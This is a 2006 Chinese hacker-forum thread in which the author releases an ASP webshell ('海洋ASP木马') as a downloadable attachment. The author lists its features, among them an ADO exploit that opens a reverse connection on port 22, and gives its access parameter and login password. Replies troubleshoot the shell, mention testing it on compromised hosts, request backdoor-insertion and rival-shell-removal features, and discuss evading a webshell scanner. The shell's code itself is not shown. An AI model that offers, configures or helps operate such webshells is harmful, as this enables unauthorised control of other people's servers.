打印

[原创]海洋ASP木马增加版(修正)

ttfct

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 279
精华: 4
积分: 4349
阅读权限: 100
性别: 男
在线时间: 113 小时
注册时间: 2006-2-13
最后登录: 2008-12-28

发短消息
加为好友
当前离线

楼主大中小发表于 2006-10-14 14:47 只看该作者

[原创]海洋ASP木马增加版(修正)

原创作者：TTFCT
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

上次放出　海洋ASP木马增加版　后搜集了很多朋友的意见，由于时间较忙，没得及时对程序作修改
在这里对大家说SORRY，同时非常感谢无敌师兄提出的好建议和对此马的关注。

1：在这个版本中，去掉了原来被人所怀疑的“统计”,（其实根本就没有什么所谓的统计，URL：http://xslt.alexa.com/site_stats/js/t/c?url=,请大家明鉴）
2：此版去掉了原来的ado stream,加上了goldsun的Ado Exploit，返弹22端口

3：有朋友说不能登陆，本人测试一切正常

4：再次确认数据库查看无问题

5：受大家的要求，此版不再加密

6：登陆方式　eviloctal=study 密码:eviloctal

7：此版不再作免杀处理。

如果大家还希望木马具有哪些功能，请提出来，先谢之！

附件

aspmm.rar (33 KB)

2006-10-14 14:47, 下载次数: 1858

第一次修正exp.mdb&aspmm.rar

TTFCT HTTP://BLOG.CSDN.NET/TTFCT
Game: HTTP://WWW.WOWFAR.COM
CAR : HTTP://WWW.BASECAR.NET

TOP

平安年间

晶莹剔透§烈日灼然

Rank: 1

帖子: 66
精华: 2
积分: 251
阅读权限: 40
性别: 男
在线时间: 16 小时
注册时间: 2006-10-3
最后登录: 2008-11-17

发短消息
加为好友
当前离线

沙发大中小发表于 2006-10-14 15:10 只看该作者

上次做了一个个人偷改版,觉得真是不错,你又出新版本,我再来改一个用用,呵呵,在此先谢谢了

另外说下那个Ado Exploit,记得以前我用时,可以在目标机上打开22端口,也可以telnet上去,不过telnet上去后,只要再动一下键盘就立马断开,不知这个版本是不是有些改进,另外,开的22端口好像权限也不大,到底什么权限得看主机的配置了,我是从没听说能拿到系统权限的,就像是一个鸡肋,食之无味,弃之可惜.

最后一句话,辛苦你了.

并非高手

TOP

ttfct

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 279
精华: 4
积分: 4349
阅读权限: 100
性别: 男
在线时间: 113 小时
注册时间: 2006-2-13
最后登录: 2008-12-28

发短消息
加为好友
当前离线

椅子大中小发表于 2006-10-14 15:32 只看该作者

对于goldsun的Ado Exploit，我还没有用此来搞过，不过，上次有朋友提出加上此功能，我测试时的确能打开22端口。但没成功利用，可能机房打了补丁。

TTFCT HTTP://BLOG.CSDN.NET/TTFCT
Game: HTTP://WWW.WOWFAR.COM
CAR : HTTP://WWW.BASECAR.NET

TOP

crisman

晶莹剔透§烈日灼然

Rank: 1

帖子: 16
精华: 0
积分: 53
阅读权限: 40
性别: 男
在线时间: 13 小时
注册时间: 2006-7-27
最后登录: 2008-12-27

发短消息
加为好友
当前离线

板凳大中小发表于 2006-10-14 15:48 只看该作者

问下LZ..那个数据库文件是什么..有什么用的。谢谢.表取笑我

TOP

ttfct

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 279
精华: 4
积分: 4349
阅读权限: 100
性别: 男
在线时间: 113 小时
注册时间: 2006-2-13
最后登录: 2008-12-28

发短消息
加为好友
当前离线

地板大中小发表于 2006-10-14 15:50 只看该作者

引用:

这里是引用第[3 楼]的crisman于2006-10-14 15:48发表的：
问下LZ..那个数据库文件是什么..有什么用的。谢谢.表取笑我

用作返弹，请上传至和此木马同一目录下使用

TTFCT HTTP://BLOG.CSDN.NET/TTFCT
Game: HTTP://WWW.WOWFAR.COM
CAR : HTTP://WWW.BASECAR.NET

TOP

sndqt

晶莹剔透§烈日灼然

Rank: 1

帖子: 28
精华: 0
积分: 85
阅读权限: 40
在线时间: 3 小时
注册时间: 2006-3-8
最后登录: 2008-5-5

发短消息
加为好友
当前离线

6楼大中小发表于 2006-10-14 16:36 只看该作者

点击 Shell.Application文件浏览操作器出现
这个BUG 杂解决........

浏览不了文件夹

TOP

hack520

运维管理组

Rank: 7 Rank: 7 Rank: 7 Rank: 7

E.S.T论坛版主

帖子: 1082
精华: 6
积分: 5594
阅读权限: 150
性别: 男
在线时间: 579 小时
注册时间: 2005-3-18
最后登录: 2008-8-31

发短消息
加为好友
当前离线

7楼大中小发表于 2006-10-14 16:43 只看该作者

[s:75] 如果你把Shell.Application删了，肯定是没法看的了

Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
注：此账号密码已更改，请本人与冰血联系修改密码。

TOP

ttfct

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 279
精华: 4
积分: 4349
阅读权限: 100
性别: 男
在线时间: 113 小时
注册时间: 2006-2-13
最后登录: 2008-12-28

发短消息
加为好友
当前离线

8楼大中小发表于 2006-10-14 17:24 只看该作者

引用:

这里是引用第[6 楼]的sndqt于2006-10-14 16:36发表的：
点击 Shell.Application文件浏览操作器出现
这个BUG 杂解决.......

.......

正如猪兄所说，这是你的问题，不是BUG。

TTFCT HTTP://BLOG.CSDN.NET/TTFCT
Game: HTTP://WWW.WOWFAR.COM
CAR : HTTP://WWW.BASECAR.NET

TOP

dingking

我伐克起来谁都挡不住！ ...

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 787
精华: 2
积分: 4830
阅读权限: 100
性别: 男
在线时间: 782 小时
注册时间: 2005-6-17
最后登录: 2009-1-7

发短消息
加为好友
当前离线

9楼大中小发表于 2006-10-14 17:33 只看该作者

编辑文件的时候出现一片空白。~而文件并未被编辑到。

昨天是明天的前天今天是昨天的明天明天是昨天的后天 ╰o╯╰o╯

TOP

ttfct

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 279
精华: 4
积分: 4349
阅读权限: 100
性别: 男
在线时间: 113 小时
注册时间: 2006-2-13
最后登录: 2008-12-28

发短消息
加为好友
当前离线

10楼 大中小发表于 2006-10-14 18:27 只看该作者

引用:

这里是引用第[9 楼]的dingking于2006-10-14 17:33发表的：
编辑文件的时候出现一片空白。~而文件并未被编辑到。

问题已解决！请重新下载

TTFCT HTTP://BLOG.CSDN.NET/TTFCT
Game: HTTP://WWW.WOWFAR.COM
CAR : HTTP://WWW.BASECAR.NET

TOP

sndqt

晶莹剔透§烈日灼然

Rank: 1

帖子: 28
精华: 0
积分: 85
阅读权限: 40
在线时间: 3 小时
注册时间: 2006-3-8
最后登录: 2008-5-5

发短消息
加为好友
当前离线

11楼 大中小发表于 2006-10-14 18:31 只看该作者

引用:

这里是引用第[7 楼]的hack520于2006-10-14 16:43发表的：
[s:75] 如果你把Shell.Application删了，肯定是没法看的了

楼上的偶没删Shell.Application
下载他的马儿放本地登录就是那个样了

TOP

ttfct

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 279
精华: 4
积分: 4349
阅读权限: 100
性别: 男
在线时间: 113 小时
注册时间: 2006-2-13
最后登录: 2008-12-28

发短消息
加为好友
当前离线

12楼 大中小发表于 2006-10-14 18:35 只看该作者

经测试，Shell.Application使用完全正常

TTFCT HTTP://BLOG.CSDN.NET/TTFCT
Game: HTTP://WWW.WOWFAR.COM
CAR : HTTP://WWW.BASECAR.NET

TOP

end!ce

晶莹剔透§烈日灼然

Rank: 1

帖子: 1
精华: 0
积分: 6
阅读权限: 40
在线时间: 45 小时
注册时间: 2006-10-7
最后登录: 2008-10-31

发短消息
加为好友
当前离线

13楼 大中小发表于 2006-10-14 18:57 只看该作者

〔干掉非本人ASP木马〕这项功能有问题了噢.连自己都会杀的！
但如果把之前的那个非修正版放上去程序就不会检测到。这样是不是有点不妥？

是不是原来那个加密过，所以程序检测不出特征码？

----------------------------------------------------------
上传/编辑/等关闭按钮不起作用

修正方法如下：

引用:

将：
<inPut tYpe=butTon vAluE=' 关闭 ' onClick='wiNdow.cloSe();'>

替换为：

<button onClick=window.opener='anyone';window.close();> 关闭 </button>

查找：

echo ".input, input {border-width: 1px;}"

在下面插入：

BUTTON ".input, input {border-width: 1px;}"

TOP

sndqt

晶莹剔透§烈日灼然

Rank: 1

帖子: 28
精华: 0
积分: 85
阅读权限: 40
在线时间: 3 小时
注册时间: 2006-3-8
最后登录: 2008-5-5

发短消息
加为好友
当前离线

14楼 大中小发表于 2006-10-14 18:58 只看该作者

引用:

这里是引用第[12 楼]的zxzgcn于2006-10-14 18:35发表的：
经测试，Shell.Application使用完全正常

听了你说后我重新下过一个然后登录显示
错误: 对象不是一个集合
咱们都是淫差别杂就那么大呢 [s:86] [s:86]

TOP

19830821

晶莹剔透§烈日灼然

Rank: 1

帖子: 11
精华: 0
积分: 39
阅读权限: 40
性别: 男
在线时间: 14 小时
注册时间: 2006-10-14
最后登录: 2008-12-28

发短消息
加为好友
当前离线

15楼 大中小发表于 2006-10-14 20:08 只看该作者

我在本机测试打开是个空白页，晕死！

TOP

19830821

晶莹剔透§烈日灼然

Rank: 1

帖子: 11
精华: 0
积分: 39
阅读权限: 40
性别: 男
在线时间: 14 小时
注册时间: 2006-10-14
最后登录: 2008-12-28

发短消息
加为好友
当前离线

16楼 大中小发表于 2006-10-14 20:11 只看该作者

在鸡上测试也是一样的

TOP

19830821

晶莹剔透§烈日灼然

Rank: 1

帖子: 11
精华: 0
积分: 39
阅读权限: 40
性别: 男
在线时间: 14 小时
注册时间: 2006-10-14
最后登录: 2008-12-28

发短消息
加为好友
当前离线

17楼 大中小发表于 2006-10-14 20:13 只看该作者

是不是我不会用哦， [s:66]

TOP

dingking

我伐克起来谁都挡不住！ ...

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 787
精华: 2
积分: 4830
阅读权限: 100
性别: 男
在线时间: 782 小时
注册时间: 2005-6-17
最后登录: 2009-1-7

发短消息
加为好友
当前离线

18楼 大中小发表于 2006-10-14 22:13 只看该作者

引用:

这里是引用第[15 楼]的19830821于2006-10-14 20:08发表的：
我在本机测试打开是个空白页，晕死！

加上参数。
http://www.xxx.com/aspmm.asp?eviloctal=study

昨天是明天的前天今天是昨天的明天明天是昨天的后天 ╰o╯╰o╯

TOP

平安年间

晶莹剔透§烈日灼然

Rank: 1

帖子: 66
精华: 2
积分: 251
阅读权限: 40
性别: 男
在线时间: 16 小时
注册时间: 2006-10-3
最后登录: 2008-11-17

发短消息
加为好友
当前离线

19楼 大中小发表于 2006-10-14 23:04 只看该作者

晕死，今天花一下午做了个改版的，没想到其中有错误，那我又得自己再改了

并非高手

TOP

skylove

晶莹剔透§烈日灼然

Rank: 1

帖子: 78
精华: 0
积分: 245
阅读权限: 40
在线时间: 197 小时
注册时间: 2005-11-13
最后登录: 2007-12-3

发短消息
加为好友
当前离线

20楼 大中小发表于 2006-10-15 00:26 只看该作者

加个bct的 Ado Exploit asp版本

http://www.xmasfox.com

TOP

平安年间

晶莹剔透§烈日灼然

Rank: 1

帖子: 66
精华: 2
积分: 251
阅读权限: 40
性别: 男
在线时间: 16 小时
注册时间: 2006-10-3
最后登录: 2008-11-17

发短消息
加为好友
当前离线

21楼 大中小发表于 2006-10-15 01:35 只看该作者

关于插入木马后门的功能不能实现，望修正

并非高手

TOP

不识愁滋味

晶莹剔透§烈日灼然

Rank: 1

帖子: 4
精华: 0
积分: 16
阅读权限: 40
性别: 男
在线时间: 0 小时
注册时间: 2006-10-12
最后登录: 2006-10-16

发短消息
加为好友
当前离线

22楼 大中小发表于 2006-10-15 08:26 只看该作者

发现这儿的菜鸟真多。连海洋都不会用。。建议还是修改2006+版的界面不好看哟。个人感觉海洋2006Plus还是不错的。

TOP

白老会

晶莹剔透§烈日灼然

Rank: 1

帖子: 37
精华: 0
积分: 90
阅读权限: 40
性别: 男
在线时间: 5 小时
注册时间: 2005-11-29
最后登录: 2009-1-1

发短消息
加为好友
当前离线

23楼 大中小发表于 2006-10-15 08:42 只看该作者

希望楼猪能加上这个功能
就是干掉别人ＡＳＰ木马里能否加个删除！！！

TOP

平安年间

晶莹剔透§烈日灼然

Rank: 1

帖子: 66
精华: 2
积分: 251
阅读权限: 40
性别: 男
在线时间: 16 小时
注册时间: 2006-10-3
最后登录: 2008-11-17

发短消息
加为好友
当前离线

24楼 大中小发表于 2006-10-15 09:00 只看该作者

引用:

这里是引用第[22 楼]的不识愁滋味于2006-10-15 08:26发表的：
发现这儿的菜鸟真多。连海洋都不会用。。建议还是修改2006+版的界面不好看哟。个人感觉海洋2006Plus还是不错的。

楼上这样说话的有点损了啊

并非高手

TOP

ttfct

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 279
精华: 4
积分: 4349
阅读权限: 100
性别: 男
在线时间: 113 小时
注册时间: 2006-2-13
最后登录: 2008-12-28

发短消息
加为好友
当前离线

25楼 大中小发表于 2006-10-15 10:41 只看该作者

引用:

这里是引用第[13 楼]的end!ce于2006-10-14 18:57发表的：
〔干掉非本人ASP木马〕这项功能有问题了噢.连自己都会杀的！
但如果把之前的那个非修正版放上去程序就不会检测到。这样是不是有点不妥？

是不是原来那个加密过，所以程序检测不出特征码？

没经过加密和相关处理,必然要被LAKE2的扫马把自己干掉

上次放出加密的就是为了不会把自己干掉才做的,结果又叫放出没加密的,没法!只有光荣牺牲!

TTFCT HTTP://BLOG.CSDN.NET/TTFCT
Game: HTTP://WWW.WOWFAR.COM
CAR : HTTP://WWW.BASECAR.NET

TOP